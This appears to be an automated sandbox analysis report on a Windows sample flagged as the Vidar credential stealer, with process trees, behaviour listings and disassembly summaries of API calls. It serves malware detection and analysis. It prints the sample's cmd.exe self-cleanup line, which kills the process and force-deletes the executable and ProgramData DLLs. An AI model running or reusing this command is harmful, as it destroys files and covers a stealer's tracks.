2021-10-16 14:53:59 UTC	6985	IN	Data Raw: 32 3a 31 36 2c 5c 78 32 32 73 62 70 72 5c 78 32 32 3a 31 36 2c 5c 78 32 32 73 63 64 5c 78 32 32 3a 31 30 2c 5c 78 32 32 73 74 6f 6b 5c 78 32 32 3a 5c 78 32 32 79 43 71 53 31 42 6c 73 6a 5a 71 67 47 54 4a 42 52 41 53 68 4c 67 58 61 48 71 59 5c 78 32 32 2c 5c 78 32 32 75 68 64 65 5c 78 32 32 3a 66 61 6c 73 65 7d 7d 27 3b 67 6f 6f 67 6c 65 2e 70 6d 63 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 70 6d 63 29 3b 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2:16,\x22sbpr\x22:16,\x22scd\x22:10,\x22stok\x22:\x22yCqS1BlsjZqgGTJBRAShLgXaHqY\x22,\x22uhde\x22:false}}';google.pmc=JSON.parse(pmc);})();</script> </body></html>
2021-10-16 14:53:59 UTC	6986	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: MSQNZmmg2F.exe PID: 1404 Parent PID: 6132

General

Start time:	16:53:17
Start date:	16/10/2021
Path:	C:\Users\user\Desktop\MSQNZmmg2F.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\MSQNZmmg2F.exe'
Imagebase:	0x400000
File size:	741376 bytes
MD5 hash:	DEAE95754F08661DC895299DD91B6443
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.247390446.0000000003480000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: VKOTTYY7FG6Q1H0K.exe PID: 6312 Parent PID: 1404

General

Start time:	16:53:53
Start date:	16/10/2021
Path:	C:\ProgramData\VKOTTYY7FG6Q1H0K.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\VKOTTYY7FG6Q1H0K.exe'
Imagebase:	0x970000
File size:	7079424 bytes
MD5 hash:	D9C2993126C94CCFD546F3A9F3F84AB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6332 Parent PID: 1404

General

Start time:	16:53:55
Start date:	16/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6360 Parent PID: 6332

General

Start time:	16:53:56
Start date:	16/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 6428 Parent PID: 6332

General

Start time:	16:53:57
Start date:	16/10/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im MSQNZmmg2F.exe /f
Imagebase:	0xcc0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 6512 Parent PID: 6332

General

Start time:	16:53:58
Start date:	16/10/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xec0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: MSQNZmmg2F.exe PID: 1404 Parent PID: 6132 MSQNZmmg2F.exeCOMMON

Executed Functions

Function 00406060, Relevance: 55.2, APIs: 30, Strings: 1, Instructions: 921stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004060D3
_memset.LIBCMT ref: 004060E6
_memset.LIBCMT ref: 004060F9
_memset.LIBCMT ref: 0040610C
lstrcpyW.KERNEL32 ref: 00406123
lstrcatW.KERNEL32(?,\*.*), ref: 00406138
FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 0040614A
lstrcpyW.KERNEL32 ref: 0040616D
lstrcatW.KERNEL32(?,004BDA94), ref: 0040617C
lstrcatW.KERNEL32(?,?), ref: 0040618E
lstrcpyW.KERNEL32 ref: 0040619D
lstrcatW.KERNEL32(?,004BDA94), ref: 004061AC
lstrcatW.KERNEL32(?,?), ref: 004061BE
lstrcmpW.KERNEL32(?,004BDA90), ref: 004061DB
lstrcmpW.KERNEL32(?,004BDA88), ref: 004061F6
PathMatchSpecW.SHLWAPI(?,00000000,?,?), ref: 00406337
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 004064E5
FindNextFileW.KERNELBASE(?,00000010,01A9B8F8,00000000,01A9B8F9,01A9BA48,00000000,01A9BA49,01A9BC70,00000000,01A9BC71,01A9B850,00000000,01A9B851,01A9BC80,00000000), ref: 00406AB0
_memset.LIBCMT ref: 00406AE5
_memset.LIBCMT ref: 00406AF8
_memset.LIBCMT ref: 00406B0B
_memset.LIBCMT ref: 00406B1E
FindClose.KERNEL32(00000000), ref: 00406B27
FindClose.KERNEL32(?), ref: 00406B64
_memset.LIBCMT ref: 00406B78
_memset.LIBCMT ref: 00406B8B
_memset.LIBCMT ref: 00406B9E
_memset.LIBCMT ref: 00406BB1

Strings

\*.*, xrefs: 0040612B

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$lstrcat$Find$Filelstrcpy$Closelstrcmp$DeleteFirstMatchNextPathSpec
String ID: \*.*
API String ID: 3848687369-1173974218
Opcode ID: fdf9b7dc646b83fa3826c66f9d158726e47d584196fd43176d260760a6dc9f5a
Instruction ID: f88104c624a839e28aef804de9cdae439da4f8deafa37ecdf9351fac06c38619
Opcode Fuzzy Hash: fdf9b7dc646b83fa3826c66f9d158726e47d584196fd43176d260760a6dc9f5a
Instruction Fuzzy Hash: 0B7209B1504340AFD725EF28CC54AABBBE8EFC4304F044A2FF59A932D1DA349959CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1C0, Relevance: 37.5, APIs: 18, Strings: 3, Instructions: 772COMMON

Download Yara Rule

APIs

Part of subcall function 00497C30: FindFirstFileW.KERNEL32(00000000,?,?,?,5EBFF6FD), ref: 00497CAC
Part of subcall function 00497C30: FindNextFileW.KERNEL32(?,?), ref: 00497D5B

Part of subcall function 00497890: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,00497C9A,?,?,5EBFF6FD), ref: 004978BB
Part of subcall function 00497890: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004978EE

Part of subcall function 00416CC0: std::_Lockit::_Lockit.LIBCPMT ref: 00416CDC

Part of subcall function 00418E70: std::_Lockit::_Lockit.LIBCPMT ref: 00418E9C
Part of subcall function 00418E70: std::_Lockit::_Lockit.LIBCPMT ref: 00418EC2

std::_Lockit::_Lockit.LIBCPMT ref: 0041F461
_memmove.LIBCMT ref: 0041F62D
_fprintf.LIBCMT ref: 0041F67A
_fprintf.LIBCMT ref: 0041F685
_fprintf.LIBCMT ref: 0041F690
_memmove.LIBCMT ref: 0041F700
_fprintf.LIBCMT ref: 0041F751
_fprintf.LIBCMT ref: 0041F75C
_fprintf.LIBCMT ref: 0041F7A4
_fprintf.LIBCMT ref: 0041F7E3
_fprintf.LIBCMT ref: 0041F7FE
_fprintf.LIBCMT ref: 0041F809
_fprintf.LIBCMT ref: 0041F827
_fprintf.LIBCMT ref: 0041F832
_fprintf.LIBCMT ref: 0041F855
_fprintf.LIBCMT ref: 0041F860
std::_Lockit::_Lockit.LIBCPMT ref: 0041FADE
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041FB63

Part of subcall function 0049C967: std::ios_base::_Tidy.LIBCPMT ref: 0049C988

Strings

`D@, xrefs: 0041FB49
FALSE, xrefs: 0041F67F, 0041F756, 0041F7DD
@~A, xrefs: 0041FB59

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$LockitLockit::_std::_$ByteCharFileFindMultiWide_memmovestd::ios_base::_$FirstIos_base_dtorNextTidy
String ID: FALSE$@~A$`D@
API String ID: 1373035807-2416371535
Opcode ID: 9fc43bb102b86dbef2d4d81e328c4f884780120b23c1dbbadb41d8178390ac8c
Instruction ID: 5e7dcd532086388c54d1623b53830e47bec628ab655d7fc7a755f79bd77299c1
Opcode Fuzzy Hash: 9fc43bb102b86dbef2d4d81e328c4f884780120b23c1dbbadb41d8178390ac8c
Instruction Fuzzy Hash: 15626DB1D002689BDF20DF55CC85BDEBBB4BF55304F1041AEE409A7281EB786A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00493CB0, Relevance: 23.3, APIs: 6, Strings: 7, Instructions: 569processCOMMON

Download Yara Rule

APIs

Part of subcall function 00418310: std::locale::_Init.LIBCPMT ref: 00418356
Part of subcall function 00418310: std::_Lockit::_Lockit.LIBCPMT ref: 00418369

Part of subcall function 004193E0: std::_Lockit::_Lockit.LIBCPMT ref: 00419439

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00493E95
Process32First.KERNEL32(00000000,00000128), ref: 00493EA8
Process32Next.KERNEL32 ref: 00493ECE

Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004181E3
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041820C
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041822B
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 0041824D
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 0041826C
Part of subcall function 004181C0: std::exception::exception.LIBCMT ref: 00418289
Part of subcall function 004181C0: __CxxThrowException@8.LIBCMT ref: 004182A8

Strings

---------- , xrefs: 00493F39, 0049407F
`D@, xrefs: 00493D43, 004944DB
E@, xrefs: 00493E06, 004943B7
D@, xrefs: 00493DAA, 004944C1
----------, xrefs: 00493E47
@M@, xrefs: 00493DD8, 00494370, 00494392
@~A, xrefs: 004944EB

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_Process32std::_$CreateFirstInitNextSnapshotToolhelp32std::locale::_
String ID: D@$ E@$----------$---------- $@M@$@~A$`D@
API String ID: 1947876736-3472057573
Opcode ID: a77bdea9291aa56004bd179747b976ffe960bb28286f174d28fbb1e951b27010
Instruction ID: c8da53fbcd29bf816c976732d3625d16abcce3a48de394747cb0a8c1bfe6c35e
Opcode Fuzzy Hash: a77bdea9291aa56004bd179747b976ffe960bb28286f174d28fbb1e951b27010
Instruction Fuzzy Hash: FA328CB1D002589BDF20DFA4CC89BDEBBB4AB45308F1481EEE40967281DB795E85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00415DD0, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 263networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415E41
InternetReadFile.WININET(?,?,000003E8,?), ref: 00415E62
_memmove.LIBCMT ref: 00415E9D
_memset.LIBCMT ref: 00415ED7
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 00415EED

Strings

text, xrefs: 00415F96

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternet$HttpInfoPointerQueryRead_memmove_memset
String ID: text
API String ID: 612126011-999008199
Opcode ID: 50a86fd9cdc75169fcd708d7d90a72b31a1f40bc6c7e780ea5959cd1955de361
Instruction ID: e0ebaa0a0649f1ff30b821f01e1e7113de7207975adba805ca53e5c4a89379d8
Opcode Fuzzy Hash: 50a86fd9cdc75169fcd708d7d90a72b31a1f40bc6c7e780ea5959cd1955de361
Instruction Fuzzy Hash: FAA17BB15047409FD354DF69C984EABBBE8FBC9704F004A2EF48A83651E738E944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0049A160, Relevance: 7.6, APIs: 5, Instructions: 127timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,00000000,?,?,0049BE07,?,?,00000000,00000000,00000010), ref: 0049A1B4
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,0049BE07,?,?,00000000,00000000), ref: 0049A1E1
GetLocalTime.KERNEL32(?,?,?,0049BE07,?,?,00000000,00000000,00000010,00000000), ref: 0049A226
SystemTimeToFileTime.KERNEL32(?,?,?,?,0049BE07,?,?,00000000,00000000,00000010,00000000), ref: 0049A236
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049A273

Part of subcall function 00499B90: GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 00499BC6

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: d2290052a66d8ccbecc3662ba118b8811eb5d8e953c18b22ce6ac8882f47d81c
Instruction ID: 49b052a15147b9ee39f4c28ebea296d5c6b066232ee049b109d558f2da80f2e4
Opcode Fuzzy Hash: d2290052a66d8ccbecc3662ba118b8811eb5d8e953c18b22ce6ac8882f47d81c
Instruction Fuzzy Hash: 5D4183B25047449FD724DF29D88096BFBE8FB88314F404A2EF59A83750D735E848CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00497C30, Relevance: 4.6, APIs: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00497890: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,00497C9A,?,?,5EBFF6FD), ref: 004978BB
Part of subcall function 00497890: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004978EE

FindFirstFileW.KERNEL32(00000000,?,?,?,5EBFF6FD), ref: 00497CAC
FindNextFileW.KERNEL32(?,?), ref: 00497D5B
FindNextFileW.KERNEL32(?,?,?,?,?), ref: 00497DE9

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$ByteCharMultiNextWide$First
String ID:
API String ID: 1501163664-0
Opcode ID: 3a6373a26f2d21c3b11210bed9abebc28a694bcf5a9f18008f86df27bd2bebd4
Instruction ID: 3406e5562c6d7def7e50202c6e88ff638cde532500e395e0ef66d413a476a895
Opcode Fuzzy Hash: 3a6373a26f2d21c3b11210bed9abebc28a694bcf5a9f18008f86df27bd2bebd4
Instruction Fuzzy Hash: E0517EB15183819BDB24DF65D885A9BFBE8FFD8304F444A2EF48983250EB78E504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00499FB0, Relevance: 4.6, APIs: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0049A001
_memmove.LIBCMT ref: 0049A0B1
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0049A64E,?,00000000,?,00004000,?,00000000,?), ref: 0049A0D5

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileWrite
String ID:
API String ID: 726942401-0
Opcode ID: ce3e57959519e93767d87bfe8bb138170d6dc63446ebdeceb8f0230666d8c143
Instruction ID: 730974dcb3174165ed3e210bd0891c87451652a1a5f8044688cda77d82c4974c
Opcode Fuzzy Hash: ce3e57959519e93767d87bfe8bb138170d6dc63446ebdeceb8f0230666d8c143
Instruction Fuzzy Hash: 3841BDB2600B019BC778DF19D984A27BBE9FBD4311B54483FE58783A01D239F815CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044FF30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(004D62A4,00000000,0046438F,?,?,?,?,?,?), ref: 0044FF65

Strings

(;M, xrefs: 0044FFAA

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID: (;M
API String ID: 31276548-4257225823
Opcode ID: ff91b48a547956df3d4998e83c14b3c83e2c41b817fc04e7db52ac1a60069007
Instruction ID: 0f363a91d4430bd996af30881705deb2d14a78b2f94ad792c22dd4b947d2161b
Opcode Fuzzy Hash: ff91b48a547956df3d4998e83c14b3c83e2c41b817fc04e7db52ac1a60069007
Instruction Fuzzy Hash: 3A217C70A036219FD751EF24BD1921BB7E4AB05706B06417BE809D6326F77C9A09CB8F

Uniqueness

Uniqueness Score: -1.00%

Function 004930A0, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32 ref: 004930D6

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b0492ebd9cf8cc04a248aeaa9f10655e873233ed06ee5ad55687c057a85912db
Instruction ID: 5cc36b3cfb016841d04148da4cd0eb132513a1df8e5ac5a04f7cf8514007072d
Opcode Fuzzy Hash: b0492ebd9cf8cc04a248aeaa9f10655e873233ed06ee5ad55687c057a85912db
Instruction Fuzzy Hash: 0C016D71108305AFD720DF24D455BEBBBE4EB95704F00CA2EE8C987240DBB895488BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00406159, Relevance: 16.7, APIs: 11, Instructions: 249stringfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32 ref: 0040616D
lstrcatW.KERNEL32(?,004BDA94), ref: 0040617C
lstrcatW.KERNEL32(?,?), ref: 0040618E
lstrcpyW.KERNEL32 ref: 0040619D
lstrcatW.KERNEL32(?,004BDA94), ref: 004061AC
lstrcatW.KERNEL32(?,?), ref: 004061BE
lstrcmpW.KERNEL32(?,004BDA90), ref: 004061DB
lstrcmpW.KERNEL32(?,004BDA88), ref: 004061F6
PathMatchSpecW.SHLWAPI(?,00000000,?,?), ref: 00406337
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 004064E5
FindNextFileW.KERNELBASE(?,00000010,01A9B8F8,00000000,01A9B8F9,01A9BA48,00000000,01A9BA49,01A9BC70,00000000,01A9BC71,01A9B850,00000000,01A9B851,01A9BC80,00000000), ref: 00406AB0
_memset.LIBCMT ref: 00406AE5
_memset.LIBCMT ref: 00406AF8
_memset.LIBCMT ref: 00406B0B
_memset.LIBCMT ref: 00406B1E
FindClose.KERNEL32(00000000), ref: 00406B27

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memsetlstrcat$FileFindlstrcmplstrcpy$CloseDeleteMatchNextPathSpec
String ID:
API String ID: 1820442255-0
Opcode ID: 10935b69d35f8731d0e751e9290c216e6dd454c650f3714f12f4c5c26fa5684e
Instruction ID: eb635a2e13e111fe5046bc7891bec954728593d5fd992ad6ad1875a3c3f0aba4
Opcode Fuzzy Hash: 10935b69d35f8731d0e751e9290c216e6dd454c650f3714f12f4c5c26fa5684e
Instruction Fuzzy Hash: 38A160B28183809BD735DF64C841BDBBBE8BFC8300F04492EE58A97251EB789558CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00499B90, Relevance: 16.7, APIs: 11, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 00499BC6
GetFileSize.KERNEL32(?,00000000,00000000), ref: 00499C4C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?), ref: 00499C6D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00499C84
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00499C8D
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00499C9E
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00499CBF
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00499CD0

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: b5c5e6cc651e35cc08c8ee874cb5ae55d34db7cfec27e9bba367e4b14d383490
Instruction ID: 0c817e89cc75ad817a9ae5a4d8d878f30a8d8e44cc530f0d6fe2d2acdd3616c3
Opcode Fuzzy Hash: b5c5e6cc651e35cc08c8ee874cb5ae55d34db7cfec27e9bba367e4b14d383490
Instruction Fuzzy Hash: 90615E71604300AFE714DF69CC81B6BBBE5FB88B04F54892EF65597290D778ED008B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004053E0, Relevance: 15.2, APIs: 10, Instructions: 195stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00415810: _memset.LIBCMT ref: 0041581B
Part of subcall function 00415810: _strcpy_s.LIBCMT ref: 00415832
Part of subcall function 00415810: _memset.LIBCMT ref: 00415851

_memset.LIBCMT ref: 00405450
_memset.LIBCMT ref: 00405463
_strtok.LIBCMT ref: 00405493
lstrcatA.KERNEL32(?,01A18250,?,?,00000000,5EBFF6FD), ref: 004054BF
lstrcatA.KERNEL32(?,00000000,?,?,00000000,5EBFF6FD), ref: 004054E2
lstrcatA.KERNEL32(?,01A14DA0), ref: 00405507
lstrcatA.KERNEL32(?,?,?,00000000), ref: 0040553C
lstrcatA.KERNEL32(?,01A15EA0), ref: 0040554C
ShellExecuteA.SHELL32(00000000,00000000,?,004BD954,00000000,00000000), ref: 0040561D
_strtok.LIBCMT ref: 00405632

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$_strtok$ExecuteShell_strcpy_s
String ID:
API String ID: 1415731133-0
Opcode ID: 341d89f46ddddef50c98099cc8efc34fb83436e4ac063339a7f69eb59c11e30b
Instruction ID: 046775943f88a2b462639773d188e03d7664df683dbc1c00585c73ee8ea758aa
Opcode Fuzzy Hash: 341d89f46ddddef50c98099cc8efc34fb83436e4ac063339a7f69eb59c11e30b
Instruction Fuzzy Hash: 2771B1B15083809FD725EB65C885EEBBBECEB85344F404D2EF18947241DB789A48CB67

Uniqueness

Uniqueness Score: -1.00%

Function 033A003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 033A024D

Strings

cess, xrefs: 033A018D
kernel32.dll, xrefs: 033A008F, 033A0095

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 7bfaa0a91bc5c045acf35ced22f85df89f4228cdb5e6f8aefa481cd96701f509
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: EC525874A01229DFDB64CF68C984BACBBB5FF09304F1480D9E94DAB251DB30AA95CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00496F10, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,5EBFF6FD), ref: 00496F89
__time64.LIBCMT ref: 00496F90

Part of subcall function 0049EA4C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00496F95,00000000), ref: 0049EA57
Part of subcall function 0049EA4C: __aulldiv.LIBCMT ref: 0049EA77

Part of subcall function 00494630: _malloc.LIBCMT ref: 00494637
Part of subcall function 00494630: GetTickCount.KERNEL32 ref: 00494644
Part of subcall function 00494630: _rand.LIBCMT ref: 00494660
Part of subcall function 00494630: _sprintf.LIBCMT ref: 00494675

Part of subcall function 004A1488: __getptd.LIBCMT ref: 004A148D

_rand.LIBCMT ref: 00496FC5

Part of subcall function 004A149A: __getptd.LIBCMT ref: 004A149A

std::_Xinvalid_argument.LIBCPMT ref: 00496FDC

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00496F4A
invalid string position, xrefs: 00496FD7

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileSleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$invalid string position
API String ID: 3490354527-3173898365
Opcode ID: 87cceb69976c1a143183b980078e9abfc98a35fe0fd86311c9bab998992f48ed
Instruction ID: 31614533f94d4b06d578f7b59eec0e1336f75c43a8e3ca7b6eba54d18b7b3029
Opcode Fuzzy Hash: 87cceb69976c1a143183b980078e9abfc98a35fe0fd86311c9bab998992f48ed
Instruction Fuzzy Hash: E741C3B1A04244ABDF14DFA9D885BAEBFB9FF84704F10013EF402A7281D7B95905CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404850, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404867

Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C80A
Part of subcall function 0049C7F5: __CxxThrowException@8.LIBCMT ref: 0049C81F
Part of subcall function 0049C7F5: std::exception::exception.LIBCMT ref: 0049C830

std::_Xinvalid_argument.LIBCPMT ref: 0040488A
std::_Xinvalid_argument.LIBCPMT ref: 004048A5
_memmove.LIBCMT ref: 00404906

Strings

invalid string position, xrefs: 00404862
string too long, xrefs: 00404885, 004048A0

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 5d1233fb76d132bfe45d1121b51c955f2a15cf75f18cee73a5e638725f07af31
Instruction ID: 4153530b7807f64ef63e448940a704c3a890f7c40205a933f81afc3ccedfe05f
Opcode Fuzzy Hash: 5d1233fb76d132bfe45d1121b51c955f2a15cf75f18cee73a5e638725f07af31
Instruction Fuzzy Hash: 7B21E1B63002418BC728EE6DE580A2AB3E1AFD5711B610D7FE252A72C1D7789C448769

Uniqueness

Uniqueness Score: -1.00%

Function 0049DF71, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0049DF8B

Part of subcall function 0049F64E: __FF_MSGBANNER.LIBCMT ref: 0049F667
Part of subcall function 0049F64E: __NMSG_WRITE.LIBCMT ref: 0049F66E
Part of subcall function 0049F64E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A212E,00000000,00000001,00000000,?,004A8BC4,00000018,004D18E0,0000000C,004A8C54), ref: 0049F693

std::exception::exception.LIBCMT ref: 0049DFC0
std::exception::exception.LIBCMT ref: 0049DFDA
__CxxThrowException@8.LIBCMT ref: 0049DFEB

Strings

bad allocation, xrefs: 0049DFB9
0@, xrefs: 0049DFA3

